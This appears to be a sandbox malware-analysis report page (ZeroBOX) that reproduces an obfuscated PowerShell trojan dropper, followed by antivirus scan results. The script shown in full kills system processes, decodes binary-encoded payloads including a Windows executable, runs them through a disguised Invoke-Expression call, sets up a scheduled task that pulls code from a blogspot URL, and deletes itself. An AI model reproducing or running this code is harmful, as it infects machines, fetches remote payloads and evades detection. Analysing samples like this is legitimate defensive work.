popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
"RegSvcs", "mshta", "wscript", "msbuild" | ForEach-Object { Stop-Process -Name $_ -Force }
$DINDHAM= "C:\ProgramData\MINGALIES"
ni $DINDHAM -it d -fo
$lulli = @'
$sexologiain = "010011010101101010010000000000000000001100000000000000000000000000000100000000000000000000000000111111111111111100000000000000001011100000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000111000011111101110100000111000000000101101000000100111001101001000011011100000000001010011001100110100100001010101000110100001101001011100110010000001110000011100100110111101100111011100100110000101101101001000000110001101100001011011100110111001101111011101000010000001100010011001010010000001110010011101010110111000100000011010010110111000100000010001000100111101010011001000000110110101101111011001000110010100101110000011010000110100001010001001000000000000000000000000000000000000000000
$bulgumchupitum = '011001100-01010110-0011*110-01*11010010110-10110-*1**1101011011010010110110101101011011*010-0010011001*11001010110-*101*001001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*0100101001001**-1011*0101*1**01**01**01**01**01**01**01001*-*0011*01011001*11001*1100101011001*1*010011010010110-0011*010-00100-100101*1*11*010-01*11*01001**0-101001**01001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*010010-00101*0011*01011001*10100100110100101100-01101*0-01*0101*00101*001001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*010010-0010011*11001010110-001100-0-01*1101*001**0101011001**0110-00101001001**0101101001**0101*001001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*010010-0010011*11001010110-001100-0-01*1101*001**0100101001**0-*00101001001011*01**0100-0011**100-00101001*0101*1**01**01**01**01001*11001*1100101011*110110-1011001*1100101011001*1*1*11*010-01*11*01001**0-101001**01001*-*0011*01011001*11001*1100101011001*1*010011010010110-0011*010-00100-100101*1*11*010-0
$Phudigum = '011001100111010101101110011*1011101*101001011011110110111*000***100101011*101101111011001*10010100101101010*001101001011011100110*0111001001111001010101*101111010101*100101011110*11010*000*1110110*01*0000*0000*0000*000*1100*10*011100100110*01101101001010*01101101110011011101*11001001101001011011100110011101011101001001*0*001101001011011100110*011100100111100101**10*011101*10*001010010*01*0000*0000*0000*0000*001*1001*100101011*101101111011001*100101011001*0101*100101011110*11010*0000*111010010000*011010110101001101111011010010110111*0000*0100*001*0*001101001011011100110*011100100111100101**10*011101*10*0010000*0110101110011011100*1011*1010010111010*0000*001110010100*111110011110*11101010111**110010111001111011001110*111101001010010010100*111110010*0010010*0100100100111001000*11110*000**10011011110111001001*010110*011*10110100*0110101001111011*00110101001100101011*10111010*000*111011001000*011011011*1011010*10*011100100101110101011011010*10110111101101110011101100110010101110010011101*0111010011101
function mkimper {
param(
[Parameter(Mandatory, ValueFromPipeline)]
[ValidateNotNullOrEmpty()]
[string]$BinaryInput
process { -join ($BinaryInput -split '(.{8})' | Where-Object { $_ } | ForEach-Object { [char][ConVert]::ToInt32($_, 2) }) }
$xmr = mkimper $Phudigum
$xmr | .('{1}{
}'.replace('
','0')-f'!','I').replace('!','ex')
(mkimper $bulgumchupitum) | .('{1}{
}'.replace('
','0')-f'!','I').replace('!','ex')
Remove-Item -Path "$DINDHAM\KAMASUTRAKIM.~!!@#!!!!!!!!!!!!!!!~" -Recurse -Force
Remove-Item -Path "$DINDHAM" -Recurse -Force
#the File will start cumiing to your pca
[IO.File]::WriteAllText("$DINDHAM\\KAMASUTRAKIM.~!!@#!!!!!!!!!!!!!!!~", $lulli)
$lulli | .('{1}{
}'.replace('
','0')-f'!','I').replace('!','ex')
$lzzzz = "001001000110110101110011011010000111010001100001010100110110001101110010011010010111000001110100001000000011110100100000010000000010001000001010001000100110000101100010011011110111010101110100001110100011110001110011011000110111001001101001011100000111010000111110011101100110000101110010001000000101111101100011011100110011110101011011001001110101011101010011011000110111001001101001011100000111010000101110010100110110100001100101011011000110110000100111001011000010001001010010011101010110111000100010010111010011101100100000011011100110010101110111001000000100000101100011011101000110100101110110011001010101100001001111011000100110101001100101011000110111010000101000010111110110001101110011010110110011000001011101001010010101101101011111011000110111001101011011001100010101110101011101001010000010011101110000011011110111011101100101011100100111001101101000011001010110110001101100001000000010110101100011001000000010100001101001011100100110110100100000011011000110100101101110011010110110001101101111011011
$ssuusussussu = mkimper $lzzzz
$minmin = "323"
$tasknm = "Deefsendersronsossl"
$chimmikum = 'capowaoct.blogspot.com/' + '//////////a' + 't' + 'o' + 'm.xml'
$ssuusussussu = $ssuusussussu.Replace('myn', $minmin)
$ssuusussussu = $ssuusussussu.Replace('Tname', $tasknm)
$ssuusussussu = $ssuusussussu.Replace('linkcom', $chimmikum)
$ssuusussussu | .('{1}{
}'.replace('
','0')-f'!','I').replace('!','ex')
$scriptPath = $MyInvocation.MyCommand.Path
Remove-Item -Path $scriptPath -Force
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.AFL
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Google Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
Varist Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
MAX Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.